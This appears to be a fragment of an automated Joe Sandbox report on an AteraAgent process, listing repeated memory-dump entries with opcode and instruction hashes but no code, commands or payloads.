                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1d555e54de1e90dee0b61c60423900a30911df7e12e989768a40950aaa4509f4
                                                                                                                                                                                                                                                                            • Instruction ID: 30265dbe4e2fec4a12edf870bc85961ebde972795a8fc5d4e5989a5626a471be
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d555e54de1e90dee0b61c60423900a30911df7e12e989768a40950aaa4509f4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EB16B2160DB494FDB95E76CD851AB577E1FF96350B0482FAD08DC72E7CA18A84AC381
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 2555f2302b53f8bdc3a9f17dc1d4d728b333cab687ea22aa9b674192e9963676
                                                                                                                                                                                                                                                                            • Instruction ID: c081659f96d3a13e0e44b61faaeaef9a4a3fe1ff0c2ac7a4db3c7228f8878a5e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2555f2302b53f8bdc3a9f17dc1d4d728b333cab687ea22aa9b674192e9963676
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C341272260E7C69FE356E76C9CA54A47FA5EF57250B0842F7D48CCB0B3D908684DC3A1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
Memory Dump Source
• Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            • Opcode ID: 7496721864908ca43d8ce583a538b1e6e139a00ab32a78d10a80ffc9bc190af2
                                                                                                                                                                                                                                                                            • Instruction ID: 12bd49faa0875b328fc3fe75a815f4c0ce0d010260ea7497556ebc1c095a92f4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7496721864908ca43d8ce583a538b1e6e139a00ab32a78d10a80ffc9bc190af2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5091E270A1DB858FEBA8D72C84597397BD1EF5A340F14457DD08EC72A2CE64A845C782
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 34e32061fbbb36fd96e7a16c89852318d3a92a58e9e10d37274bc8d3c14b7638
                                                                                                                                                                                                                                                                            • Instruction ID: baa1fbcaf6a7ceaf8863441301b45a67fc03aebff6dda25a364ed9f372816861
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34e32061fbbb36fd96e7a16c89852318d3a92a58e9e10d37274bc8d3c14b7638
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7791F86291CF868FF654E728C444B79B7E2FF56390F444579D04EC7192DE28A886C7C2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e4df556522c4c2c8395e218beba0d2a8d15f5aa2b4774136e6438ae82ceeecff
                                                                                                                                                                                                                                                                            • Instruction ID: 4e230497c74c5241ac533a97a003b83ecc47d20eec24763c615b854b8ce67041
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4df556522c4c2c8395e218beba0d2a8d15f5aa2b4774136e6438ae82ceeecff
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C781583061EB898FE769D76C98257757BD0EF9A350F1445BED08DC32A3DE24A849C381
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 9f6d21738bee98cb56e2e3732595e99ead6a4f720e0276c1aa6503dc5a7b2393
                                                                                                                                                                                                                                                                            • Instruction ID: a30f784d11fde1b81bbfb4f9869ca349d8820d5e7e9c5292c843a57736649da9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f6d21738bee98cb56e2e3732595e99ead6a4f720e0276c1aa6503dc5a7b2393
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0715652A1FACA8FF76693AC98551756FE1EF9729071841FBD09CC72A3DC045C4A83C1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: cf05f502fd9ba1a591d5a76853c114cb90cc71bfcf75a7048488e8cefa0b9c1f
                                                                                                                                                                                                                                                                            • Instruction ID: 9d7b00b0857d5e851a9d0b8e26e91d82802ce97e7baa10b370f77a9ff77429af
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf05f502fd9ba1a591d5a76853c114cb90cc71bfcf75a7048488e8cefa0b9c1f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50918171918A8E8FDB84EF68C854AEDB7F1FF59300F104679D40DD72A6DA34A846CB80
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 74d4119e20fea6f45ace336c2f7e7fbc9b0ed07b1ef67d268c7e4f34aa0a123a
                                                                                                                                                                                                                                                                            • Instruction ID: a583232ac751fffa0cdbbe5eecb2869b5039f4f5d163b9cd86c9989592ada505
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74d4119e20fea6f45ace336c2f7e7fbc9b0ed07b1ef67d268c7e4f34aa0a123a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8619C32A0EB4B8FE759AB6CD8515757BE1EF66350B0441BED48EC7193D928BC4A83C0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 857e31cd4ebdba4dea93a2906437b78adb6011f508e7ee6f451deccaa47041de
                                                                                                                                                                                                                                                                            • Instruction ID: d591c08af9264ad2e30d06eb1a760a73050dea8a51ee400bb5bcb1a8bdbd13eb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 857e31cd4ebdba4dea93a2906437b78adb6011f508e7ee6f451deccaa47041de
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56615A7290DF898FE759A72C98555BCBBE1EF47390B1441BAD05DC71E7C9242C0A83D1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5d0ea24aee45221ec86a80aa5b9c3f5b7e4a99e6cd7aa4f881c1852b0fa3898d
                                                                                                                                                                                                                                                                            • Instruction ID: ba8c5d64faaaeb5875b213bada0405af9a35669ef7f778020b640cda27fc3f75
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d0ea24aee45221ec86a80aa5b9c3f5b7e4a99e6cd7aa4f881c1852b0fa3898d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F71E23190DA899FEB94EF6CC8656F83FE0EF56354F0541B6E45CC71A2CA24A849C781
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 137183fbb61663626f81832b75d27664dc864ecae7e921a96fe54ee95ebcae65
                                                                                                                                                                                                                                                                            • Instruction ID: aaac5ccf04bf4797e3a3826c1e164c7c283f93d34843a322b732343709bb6cbd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 137183fbb61663626f81832b75d27664dc864ecae7e921a96fe54ee95ebcae65
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0515B62B29E194FE7D8A72C98597B937D1EF95390F0801BBE44DC72A1DE189C8683C1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 099c35bbd5d98d1237194de020d956b04b7b7c51afeff2091f5d7d87021e7a00
                                                                                                                                                                                                                                                                            • Instruction ID: ee35d6485544e8d3df5dda96733785bdfcee13cb65abf6a4474f17c685b65120
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 099c35bbd5d98d1237194de020d956b04b7b7c51afeff2091f5d7d87021e7a00
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18812B70D0961D8FEB59DB68C854BEDBBB0EF56340F5041BAD00DE72A2CB386989CB51
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f85a1eeca4400897c1850bd8bbc8ff1c899539faaff490b630c56703442d63ee
                                                                                                                                                                                                                                                                            • Instruction ID: fd35b8bd14140475b6730657d1c91a43d7d199d4a9fe7061fd32c5b246a3fdf2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f85a1eeca4400897c1850bd8bbc8ff1c899539faaff490b630c56703442d63ee
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9161073080E7888FD746CB68C864B997FF1EF57344F2441EAD048DB2A2CA394D86CB61
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 23b63f3cf27b8af60312a99f3aa9a8d6c1e66b3dca30c4875d6a2f68ddcd6444
                                                                                                                                                                                                                                                                            • Instruction ID: 0f029bbaa41d200fc8241d166106fb4f7adea28509901c54c369036e35aa3410
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23b63f3cf27b8af60312a99f3aa9a8d6c1e66b3dca30c4875d6a2f68ddcd6444
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E351C943D4EFC29BF65573ACE4251FCEBA0AF923A5B1985B7D04C460E79C08580D52D2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6dce57490ee7f76550be92530ba17f50fab5058248f533f3c9854e8612c5b2a1
                                                                                                                                                                                                                                                                            • Instruction ID: 51f026919b34f5b23c496025d0c44b2b2cddd1b33b69505066305bed7a2b4589
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dce57490ee7f76550be92530ba17f50fab5058248f533f3c9854e8612c5b2a1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4551B947E4EFD29BF66573ACE4251FCEBA0AF923E5B0985B7D04C860E79C08580D52D2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 2af31a407af8a5bf285f4265b2424dc8ba7973e7a1a70276c7a4f5e34dd1d7e8
                                                                                                                                                                                                                                                                            • Instruction ID: 5594045fc423985686b99937768cf9179fa5f2f6e1bb821aeb8433a062030e87
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2af31a407af8a5bf285f4265b2424dc8ba7973e7a1a70276c7a4f5e34dd1d7e8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60511C2270DD498FF7A9E32C845567977E1EF95380B0940BAD08EC32A2DE18AC4AC3C1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: dcd58c7f499cafb47f824bef22cc21f4ef2e7303379959b7ebcc2c8db8f803e2
                                                                                                                                                                                                                                                                            • Instruction ID: d7dd3fc75f51b8f4c87488e9750cff109a1d3095fe387aa5bb0cfc9f57198851
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcd58c7f499cafb47f824bef22cc21f4ef2e7303379959b7ebcc2c8db8f803e2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5411962B5DF8A8FE798E72CD4612B9B3D1FFD6250B08417AD04DC7292DD18D80643C1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 4214a658648359e65518d21641e740d48edc63bdf074ea99125d84151da08472
                                                                                                                                                                                                                                                                            • Instruction ID: dbc062d9c80c981c024c2f455cde6af0444dd50a6f7116f391ee6fcee55d5e9b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4214a658648359e65518d21641e740d48edc63bdf074ea99125d84151da08472
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F51D6A1B1DE498FEB98EB2C8055A6937E1EF5A340F0481F9D44DCB2A7CD18AC49C381
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
Memory Dump Source
• Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 9b46b0e9dae2ed72987a09da0e332f23959ba8b73fb97f510d074da93345041a
                                                                                                                                                                                                                                                                            • Instruction ID: 057354096d11c225202d4e77fbb05944b954af130b286e94f781f957b252c816
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b46b0e9dae2ed72987a09da0e332f23959ba8b73fb97f510d074da93345041a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A41F23061AE0A8FD7689B18C884A7177E5FF5A340B148679D44DCB2A6DA35FC8AC7C1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1bc0bd443ff2b130329d15125023c46bfbde611f1f51790df5709a38810429b4
                                                                                                                                                                                                                                                                            • Instruction ID: 4538dfb6ea6ea003f56b9ba049879fe7bddc2ce4d56c2b6ca86af56e4d60deb0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bc0bd443ff2b130329d15125023c46bfbde611f1f51790df5709a38810429b4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D251407411AB06CFDB59EB28C090E6577A1FF56384B6089ADD05ECB6E2CA35EC46CB40
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0f25c49b2b7df76a1682696429b601c84a2a4810a565781014aaf66d953791c1
                                                                                                                                                                                                                                                                            • Instruction ID: 81ae24eef47f5194eae222518fc167c10728fb68df07ea6bce63398a1e62769f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f25c49b2b7df76a1682696429b601c84a2a4810a565781014aaf66d953791c1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10512870919A0DCFDF94EF68C455AEDBBB1EF59340F10416AE40DE72A2DB39A844CB81
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 89fd7e2f0391371f470cb8eb044eac9f78235d34bca3510cc7afa4b610d92d13
                                                                                                                                                                                                                                                                            • Instruction ID: 73642a52aac4237cf57c4f7db47450e85029ec53c80918ed48a47e4a1f159ef0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89fd7e2f0391371f470cb8eb044eac9f78235d34bca3510cc7afa4b610d92d13
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4441132061DA8A4FE799E72CC815A797BD1EF9A350B1441FEE44DC73A3DD18AC868381
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 8e02044c6895715326c70484328a5992de242bdd64def9c47a698440bb4fd4c1
                                                                                                                                                                                                                                                                            • Instruction ID: 0be0e95f0b185b65003e9bb2d781e0839c9af3df55ce2419ad0a08a7257a1db8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e02044c6895715326c70484328a5992de242bdd64def9c47a698440bb4fd4c1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50418F70909A8DDFDB41DB6CC454AADBFF1EF5B340F1441AAD048DB2A2CA389945CBA1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c5bc701c2e1f283beb7e7dd3dc91d416a171e517c17a0ab2e0847b599157f5d2
                                                                                                                                                                                                                                                                            • Instruction ID: 19b1be2319bdd38b9f8c36cec29ccee204e839f1a4cadd0351bd6bfb2ad5af79
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5bc701c2e1f283beb7e7dd3dc91d416a171e517c17a0ab2e0847b599157f5d2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86418F3061DA858FEBA5EB2CC050E7677E1EF56340B1485A9D08ECB6A2CD25F849CB91
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ee372422686e8e79ab04eef646700d770e4f80839b58b91441ec647990801663
                                                                                                                                                                                                                                                                            • Instruction ID: 0a7d0382dc1649f92eab0c931af6e102459fcc3effc9fbb6b711e45422883ef0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee372422686e8e79ab04eef646700d770e4f80839b58b91441ec647990801663
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66416C70919A0DCFDF94EF68C455AEDBBB1EF59340F10416AD40DE72A2CB39A844CB81
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
